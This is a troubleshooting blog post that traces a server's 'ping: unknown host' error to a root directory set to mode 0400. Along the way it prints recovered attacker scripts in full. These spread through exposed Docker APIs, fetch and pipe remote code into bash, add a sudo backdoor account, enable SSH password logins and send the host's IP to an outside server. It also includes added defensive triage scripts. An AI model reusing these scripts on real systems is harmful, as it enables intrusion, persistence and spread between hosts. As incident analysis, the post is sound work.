A maddening case of "ping: unknown host"

Published: 2019-06-26


Background:

A customer's ECS instance reports "unknown host" when pinging a domain name, while pinging an IP address works. A packet capture taken during the ping shows no DNS query leaving the host at all. Is this a name resolution problem?

1. Ping the domain name while capturing packets: no DNS query packet goes out

# ping www.baidu.com -c 1
ping: unknown host www.baidu.com
# tcpdump -i any port 53 -nnvv
tcpdump: listening on any, link-type LINUX_SLL (Linux cooked), capture size 65535 bytes

2. Pinging the IP address, dig and getent all work normally

# ping -c 1 115.239.210.27
PING 115.239.210.27 (115.239.210.27) 56(84) bytes of data.
64 bytes from 115.239.210.27: icmp_seq=1 ttl=55 time=1.87 ms

--- 115.239.210.27 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 1.875/1.875/1.875/0.000 ms
# getent hosts www.baidu.com
115.239.211.112 www.a.shifen.com www.baidu.com
115.239.210.27  www.a.shifen.com www.baidu.com
# dig www.baidu.com +short
www.a.shifen.com.
115.239.210.27
115.239.211.112

3. The tests above establish that DNS itself is working; the fault lies in ping itself.


4. Use strace to see whether ping has trouble loading any files while it runs

# strace -e open ping www.baidu.com
open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
open("/lib64/libcap.so.2", O_RDONLY|O_CLOEXEC) = 3
open("/lib64/libidn.so.11", O_RDONLY|O_CLOEXEC) = 3
open("/lib64/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
open("/lib64/libattr.so.1", O_RDONLY|O_CLOEXEC) = 3
......
open("/etc/resolv.conf", O_RDONLY|O_CLOEXEC) = -1 EACCES (Permission denied)
open("/etc/nsswitch.conf", O_RDONLY|O_CLOEXEC) = -1 EACCES (Permission denied)
open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = -1 EACCES (Permission denied)
open("/lib64/tls/x86_64/libnss_dns.so.2", O_RDONLY|O_CLOEXEC) = -1 EACCES (Permission denied)
open("/lib64/tls/libnss_dns.so.2", O_RDONLY|O_CLOEXEC) = -1 EACCES (Permission denied)
open("/lib64/x86_64/libnss_dns.so.2", O_RDONLY|O_CLOEXEC) = -1 EACCES (Permission denied)
open("/lib64/libnss_dns.so.2", O_RDONLY|O_CLOEXEC) = -1 EACCES (Permission denied)
open("/usr/lib64/tls/x86_64/libnss_dns.so.2", O_RDONLY|O_CLOEXEC) = -1 EACCES (Permission denied)
open("/usr/lib64/tls/libnss_dns.so.2", O_RDONLY|O_CLOEXEC) = -1 EACCES (Permission denied)
open("/usr/lib64/x86_64/libnss_dns.so.2", O_RDONLY|O_CLOEXEC) = -1 EACCES (Permission denied)
open("/usr/lib64/libnss_dns.so.2", O_RDONLY|O_CLOEXEC) = -1 EACCES (Permission denied)
ping: unknown host www.baidu.com
+++ exited with 2 +++

For comparison, a healthy host (the output differs somewhat between versions):

# strace -e open ping -c 1 www.baidu.com
open("/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
open("/lib64/libcap.so.2", O_RDONLY|O_CLOEXEC) = 3
open("/lib64/libidn.so.11", O_RDONLY|O_CLOEXEC) = 3
open("/lib64/libcrypto.so.10", O_RDONLY|O_CLOEXEC) = 3
open("/lib64/libresolv.so.2", O_RDONLY|O_CLOEXEC) = 3
open("/lib64/libm.so.6", O_RDONLY|O_CLOEXEC) = 3
.......

5. Extract every file that failed with "Permission denied" and inspect its permissions (I trimmed the output a bit)

# strace -e open -o p.out ping www.baidu.com |grep -i "Permission denied" p.out| awk -F "\\\"" '{print $2}'|xargs stat
  File: ‘/usr/lib/locale/locale-archive’
  Size: 106065056     Blocks: 207096     IO Block: 4096   regular file
Device: fd01h/64769d    Inode: 132883      Links: 1
Access: (0644/-rw-r--r--)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2019-05-10 21:46:34.523000000 +0800
Modify: 2015-07-13 15:21:14.804155630 +0800
Change: 2015-07-13 15:21:14.804155630 +0800
 Birth: -
  File: ‘/usr/share/locale/locale.alias’
  Size: 2502          Blocks: 8          IO Block: 4096   regular file
Device: fd01h/64769d    Inode: 132816      Links: 1
Access: (0644/-rw-r--r--)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2019-05-10 21:48:09.380738442 +0800
Modify: 2015-03-06 05:18:56.000000000 +0800
Change: 2015-07-13 15:21:09.324089405 +0800
 Birth: -
  File: ‘/usr/lib64/gconv/gconv-modules.cache’
  Size: 26254         Blocks: 56         IO Block: 4096   regular file
Device: fd01h/64769d    Inode: 394951      Links: 1
Access: (0644/-rw-r--r--)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2019-05-10 21:46:34.878000000 +0800
Modify: 2015-07-13 15:21:15.860168393 +0800
Change: 2015-07-13 15:21:15.860168393 +0800
 Birth: -
  File: ‘/usr/lib64/gconv/gconv-modules’
  Size: 56377         Blocks: 112        IO Block: 4096   regular file
Device: fd01h/64769d    Inode: 394941      Links: 1
Access: (0644/-rw-r--r--)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2015-07-13 15:21:15.857168356 +0800
Modify: 2015-03-06 05:18:55.000000000 +0800
Change: 2015-07-13 15:21:15.510164163 +0800
 Birth: -
  File: ‘/etc/resolv.conf’
  Size: 109           Blocks: 8          IO Block: 4096   regular file
Device: fd01h/64769d    Inode: 660033      Links: 1
Access: (0644/-rw-r--r--)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2019-05-10 21:50:51.650325504 +0800
Modify: 2019-05-10 21:47:49.650000000 +0800
Change: 2019-05-10 21:47:49.650000000 +0800
 Birth: -
  File: ‘/etc/nsswitch.conf’
  Size: 1728          Blocks: 8          IO Block: 4096   regular file
Device: fd01h/64769d    Inode: 658832      Links: 1
Access: (0644/-rw-r--r--)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2019-05-10 21:47:44.965000000 +0800
Modify: 2015-07-13 15:21:28.905326045 +0800
Change: 2015-07-13 15:21:28.905326045 +0800
 Birth: -
  File: ‘/etc/ld.so.cache’
  Size: 44226         Blocks: 88         IO Block: 4096   regular file
Device: fd01h/64769d    Inode: 658829      Links: 1
Access: (0644/-rw-r--r--)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2019-05-10 21:46:33.738000000 +0800
Modify: 2019-03-22 00:16:26.262531411 +0800
Change: 2019-03-22 00:16:26.262531411 +0800
 Birth: -
  File: ‘/lib64/libnss_dns.so.2’ -> ‘libnss_dns-2.17.so’
  Size: 18            Blocks: 0          IO Block: 4096   symbolic link
Device: fd01h/64769d    Inode: 151673      Links: 1
Access: (0777/lrwxrwxrwx)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2019-05-10 21:47:09.952000000 +0800
Modify: 2015-07-13 15:21:15.089159075 +0800
Change: 2015-07-13 15:21:15.089159075 +0800
 Birth: -
  File: ‘/usr/lib64/libnss_dns.so.2’ -> ‘libnss_dns-2.17.so’
  Size: 18            Blocks: 0          IO Block: 4096   symbolic link
Device: fd01h/64769d    Inode: 151673      Links: 1
Access: (0777/lrwxrwxrwx)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2019-05-10 21:47:09.952000000 +0800
Modify: 2015-07-13 15:21:15.089159075 +0800
Change: 2015-07-13 15:21:15.089159075 +0800
 Birth: -

6. Comparing the file permissions turned up nothing obviously wrong either. I was rather stumped and sank into deep thought.


7. Try the "has it been hacked?" angle: verify the RPM packages, replace the ping binary, and look for traces of intrusion

#  for i in $(rpm -qa);do rpm --verify $i ||echo $i ;done|grep bin |grep -v "node_modules"
S.5......    /usr/bin/git
S.5......    /usr/bin/git-receive-pack
S.5......    /usr/bin/git-shell
S.5......    /usr/bin/git-upload-archive
S.5......    /usr/bin/git-upload-pack
# lsmod
Module                  Size  Used by
tcp_diag               12591  0
inet_diag              18543  1 tcp_diag
dm_mirror              22135  0
......
ata_piix               35038  0
i2c_core               40325  3 drm,i2c_piix4,drm_kms_helper
libata                218854  3 pata_acpi,ata_generic,ata_piix

Commands, processes and kernel modules show no obvious anomalies.


8. Back to the problem itself: file access is being denied, so go to the root directory and check the permissions entry by entry

# ls -l
total 136
-rwxrwxrwx    1 root root  1963 Feb 27 03:38 autom.sh
lrwxrwxrwx.   1 root root     7 Nov 21  2014 bin -> usr/bin
dr-xr-xr-x.   4 root root  4096 May 10 21:47 boot
drwxr-xr-x   19 root root  3040 May 10 21:50 dev
drwxr-xr-x. 102 root root 12288 May 10 21:50 etc
drwxr-xr-x.   8 root root  4096 Mar 22 00:15 home
lrwxrwxrwx.   1 root root     7 Nov 21  2014 lib -> usr/lib
lrwxrwxrwx.   1 root root     9 Nov 21  2014 lib64 -> usr/lib64
drwxrwxrwx    2 root root  4096 Jan 29 17:57 logs
drwx------.   2 root root 16384 Nov 22  2014 lost+found
drwxr-xr-x.   2 root root  4096 Jun 10  2014 media
drwxr-xr-x.   3 root root  4096 Oct 23  2015 mnt
lrwxrwxrwx    1 root root     9 Oct 23  2015 opt -> /mnt/opt/
drwxrwxr-x    3 root root  4096 Oct  9  2018 path
dr-xr-xr-x   93 root root     0 May 10 21:50 proc
dr-xr-x---.  30 root root  4096 May 10 23:36 root
drwxr-xr-x   30 root root   840 May 10 21:51 run
lrwxrwxrwx.   1 root root     8 Nov 21  2014 sbin -> usr/sbin
drwxrwxr-x    6 root root  4096 Jan 29 17:54 shell
drwxrwxr-x    7 root root  4096 Jan 29 20:20 springbootdemo2
drwxr-xr-x.   2 root root  4096 Jun 10  2014 srv
dr-xr-xr-x   13 root root     0 May 11  2019 sys
-rwxrwxrwx    1 root root   356 Nov  1  2018 test1.sh
-rwxrwxrwx    1 root root   127 Nov  1  2018 test2.sh
drwxrwxrwt.  26 root root 40960 May 11 00:10 tmp
drwxrwxr-x    3 root root  4096 Dec 22 14:48 Users
drwxr-xr-x.  14 root root  4096 Aug  6  2018 usr
drwxr-xr-x.  23 root root  4096 May  6 11:31 var

9. Comparing permissions showed nothing, but a few scripts turned up. Let's see what they do

# cat test1.sh test2.sh
#!/bin/bash
sed -i 's/\r//g' $1
sed -i '/::/g' $1
while read HOSTLINE
do
echo NOW WORKING ON $HOSTLINE
docker -H tcp://$HOSTLINE run --rm -v /:/mnt alpine chroot /mnt /bin/sh -c "yum install wget -y;apt-get install wget -y;wget http://51.*.*.146/autom.sh -O /autom.sh;chmod 777 /autom.sh;sh /autom.sh"
echo DONE WITH $HOSTLINE
sed -i '1d' $1
done <$1
-----------------
#!/bin/bash
sed -i 's/\r//g' $1
sed -i '/::/g' $1
while read HOSTLINE
do
sh test1.sh $1 & sleep 7; sed -i '1d' $1;
done <$1
-----------------
# cat autom.sh
#!/bin/sh
useradd -m -p '$1$tVoMAZYE$s5CynwZ4QuboPD2qVQ0h9/' akay
adduser -m -p '$1$tVoMAZYE$s5CynwZ4QuboPD2qVQ0h9/' akay
usermod -aG sudoers akay;
usermod -aG root akay;
sudo adduser akay sudo;
echo 'akay  ALL=(ALL:ALL) ALL' >> /etc/sudoers;
sed -i 's/PasswordAuthentication no/PasswordAuthentication yes/g' /etc/ssh/sshd_config;
curl icanhazip.com >/tmp/myip.txt
ip=$(cat /tmp/myip.txt)
curl http://51.*.*.146/ip.php?ip=$ip
/etc/init.d/ssh restart;
/etc/init.d/sshd restart;
/etc/rc.d/sshd restart;
systemctl restart sshd;
systemctl restart ssh;
apt-get install screen -y
yum install screen -y
if [ $(dpkg-query -W -f='${Status}' systemd 2>/dev/null | grep -c "ok installed") -eq 0 ];
then
  apt-get install systemd -y;
  yum install systemd -y;
fi;
if [ $(dpkg-query -W -f='${Status}' masscan 2>/dev/null | grep -c "ok installed") -eq 0 ];
then
  apt-get install masscan -y;
  yum install masscan -y;
fi;
if [ $(dpkg-query -W -f='${Status}' iproute2 2>/dev/null | grep -c "ok installed") -eq 0 ];
then
  apt-get install iproute2 -y;
  yum install iproute2 -y;
fi;
curl -s http://51.*.*.146/logo9.jpg | bash -s
wget http://51.*.*.146/test1.sh -O test1.sh;
wget http://51.*.*.146/test2.sh -O test2.sh;
#wget http://51.*.*.146/scanner.sh -O scanner.sh;
sleep 2s;
chmod 777 test1.sh;
chmod 777 test2.sh;
sleep 2s;
killall xmrig;
killall xm;
killall proc;
killall minergate-cli;
killall xmr-stak;
pkill -f xmrig;
pkill -f xmr-stak;
pkill -f xm;
kill -9 xmrig;
kill -9 xmr-stak;
kill -a xmrig;
kill -a xmr-stak;
kill -a xm;
sudo killall minergate-cli;
sudo kill -9 minergate-cli;
sudo pkill -f minergate-cli;
sudo killall proc;
sudo kill -9 proc;
sudo pkill -f proc;
sudo killall xmrig;
sudo killall xmr-stak;
sudo pkill -f xmrig;
sudo pkill -f xmr-stak;
sudo kill -9 xmrig;
sudo kill -9 xmr-stak;
sudo kill -a xmrig;
sudo kill -a xmr-stak;
systemctl daemon-reload;
systemctl stop bashd.service;
systemctl disable bashd.service;
#sudo sh scanner.sh &

10. So it really had been hacked. While the customer considered the purchase I recommended, I kept looking at the ping problem purely out of research interest.
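The recovered scripts give a concrete list of traces to look for on this host and on any other machine the same campaign reached: autom.sh creates the account "akay", appends it to /etc/sudoers, flips PasswordAuthentication to yes, and fetches test1.sh/test2.sh with mode 777; test1.sh writes /autom.sh into a target's root directory through an exposed Docker API, which matches the 777 /autom.sh found at / above. The following triage script is an added example, not part of the original post or of any vendor tool. It is written as a defender's offline check: ROOT is "/" for the live host or the mount point of a disk snapshot, so a suspect image can be examined without executing anything from it. Everything it looks for comes from the scripts shown above; the only extra check is the mode of the root directory itself, which is the fault this post eventually finds.

```shell
#!/bin/sh
# Added example (not from the original post): triage a filesystem for the traces
# the recovered autom.sh / test1.sh leave behind.  $1 is "/" for the live host
# or the mount point of a snapshot of the suspect disk for offline review.

# Print each finding and return the number of findings (0 = nothing found).
triage_host() {
    root=${1%/}            # "/" becomes "" so "$root/etc" works in both cases
    n=0

    # autom.sh creates a backdoor account "akay" and appends it to sudoers.
    if grep -q '^akay:' "$root/etc/passwd" 2>/dev/null; then
        echo "FINDING: backdoor account 'akay' in $root/etc/passwd"
        n=$((n + 1))
    fi
    if grep -q '^akay[[:space:]]*ALL=' "$root/etc/sudoers" 2>/dev/null; then
        echo "FINDING: sudoers entry for 'akay' in $root/etc/sudoers"
        n=$((n + 1))
    fi

    # It flips PasswordAuthentication to yes so the new account can log in via SSH.
    if grep -Eq '^[[:space:]]*PasswordAuthentication[[:space:]]+yes' \
            "$root/etc/ssh/sshd_config" 2>/dev/null; then
        echo "FINDING: password SSH logins enabled in $root/etc/ssh/sshd_config"
        n=$((n + 1))
    fi

    # test1.sh drops autom.sh at the target's "/" via the Docker API; autom.sh
    # then fetches test1.sh/test2.sh into its working directory with mode 777.
    for f in autom.sh test1.sh test2.sh; do
        if [ -f "$root/$f" ]; then
            echo "FINDING: dropper/scanner script $root/$f (mode $(stat -c '%a' "$root/$f"))"
            n=$((n + 1))
        fi
    done

    # Any other world-writable regular file directly under the root is suspicious.
    for f in $(find "$root/" -maxdepth 1 -type f -perm -002 2>/dev/null); do
        case "$f" in
            */autom.sh|*/test1.sh|*/test2.sh) ;;          # already reported above
            *) echo "FINDING: world-writable file $f"; n=$((n + 1)) ;;
        esac
    done

    # The root directory mode itself (0400 on the machine in this post).
    mode=$(stat -c '%a' "$root/")
    case "$mode" in
        555|755) ;;                                       # normal for CentOS / Debian
        *) echo "FINDING: unusual mode $mode on $root/"; n=$((n + 1)) ;;
    esac

    echo "$n finding(s)"
    return $n
}

# Usage: sh triage_host.sh /            (live host)
#        sh triage_host.sh /mnt/snapshot (offline image)
if [ $# -gt 0 ]; then
    triage_host "$1"
fi
```

The exit status doubles as the finding count, so the function can be chained in an inventory loop and hosts with a non-zero result collected for a closer look; the account name and file names are hard-coded because they are the indicators this particular campaign left behind, and a reusable version would take them as parameters.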


11. A flash of insight: what are the permissions on the root directory itself? (Don't worry about the timestamps; I redid many of the tests while writing this article.)

The affected machine:

# ls -ld /
dr--------. 22 root root 4096 May 10 21:47 /

A healthy machine:

# ls -ld /
dr-xr-xr-x. 19 root root 4096 Apr 30 17:33 /

# chmod 555 /
# ping -c 2 www.baidu.com
PING www.a.shifen.com (115.239.210.27) 56(84) bytes of data.
64 bytes from 115.239.210.27: icmp_seq=1 ttl=55 time=1.84 ms
64 bytes from 115.239.210.27: icmp_seq=2 ttl=55 time=1.86 ms

--- www.a.shifen.com ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1001ms
rtt min/avg/max/mdev = 1.842/1.854/1.866/0.012 ms

Done!
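Why only ping was affected, and why the stat output in step 5 looked clean, is worth spelling out (this is my reading of the iputils source, not something the post states): ping is built against libcap (libcap.so.2 appears in the strace) and at startup its limit_capabilities() routine drops every capability except CAP_NET_RAW and CAP_NET_ADMIN, so even when root runs it, it loses CAP_DAC_OVERRIDE and CAP_DAC_READ_SEARCH and is bound by ordinary mode bits. With / at 0400 nobody, root included, has search permission on it, and every path lookup after that point fails. The strace in step 4 shows exactly this boundary: the libraries opened by the dynamic loader before main() succeed, and everything opened afterwards, including /etc/ld.so.cache a second time, returns EACCES. dig and getent keep root's full capability set, so they never noticed. The lesson for the next investigation is that stat on the failing file alone is not enough; the permissions of every ancestor directory matter. The following script is an added example, not code from the original post: given a path that failed with EACCES, it walks from / down and flags each directory whose mode denies search permission to "others", which would have pointed at / immediately in step 5.

```shell
#!/bin/sh
# Added example (not from the original post): given a path that failed with
# EACCES, print the mode of "/" and of every directory component below it and
# flag the ones without the search (x) bit for "others".  stat on the final
# file alone, as in step 5 above, cannot reveal an ancestor such as "/" at 0400.

# Print one directory; return 1 when "others" lack search permission on it.
report_dir() {
    mode=$(stat -c '%a' "$1" 2>/dev/null) || return 0   # skip what we cannot stat
    others=${mode#"${mode%?}"}        # last octal digit = rwx bits for "others"
    if [ $((others & 1)) -eq 1 ]; then
        printf '  ok       %4s  %s\n' "$mode" "$1"
        return 0
    fi
    printf '  BLOCKED  %4s  %s  (no search permission for others)\n' "$mode" "$1"
    return 1
}

# Walk from "/" down to the parent directory of the last component of $1.
# Returns 0 if every ancestor is searchable, 1 if at least one is not.
check_ancestors() {
    blocked=0
    cur=/
    report_dir "$cur" || blocked=1
    old_ifs=$IFS
    IFS=/
    set -f                            # no globbing while splitting on "/"
    set -- $1
    set +f
    IFS=$old_ifs
    for comp in "$@"; do
        [ -z "$comp" ] && continue
        if [ "$cur" = / ]; then cur="/$comp"; else cur="$cur/$comp"; fi
        [ -d "$cur" ] || break        # reached the file itself (or a missing path)
        report_dir "$cur" || blocked=1
    done
    return $blocked
}

# Usage: sh check_ancestors.sh /etc/resolv.conf
if [ $# -gt 0 ]; then
    check_ancestors "$1"
fi
```

The check reads the mode bits with stat instead of using `test -x`, because `test -x` run as root answers "yes" for every directory (root bypasses DAC checks) and would have hidden the very problem this post is about; a process that has dropped its DAC capabilities, like ping here, sees the bits and nothing else.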


This article is original content from the Yunqi Community (云栖社区); reproduction without permission is prohibited.

Reposted from: https://my.oschina.net/u/1464083/blog/3048774
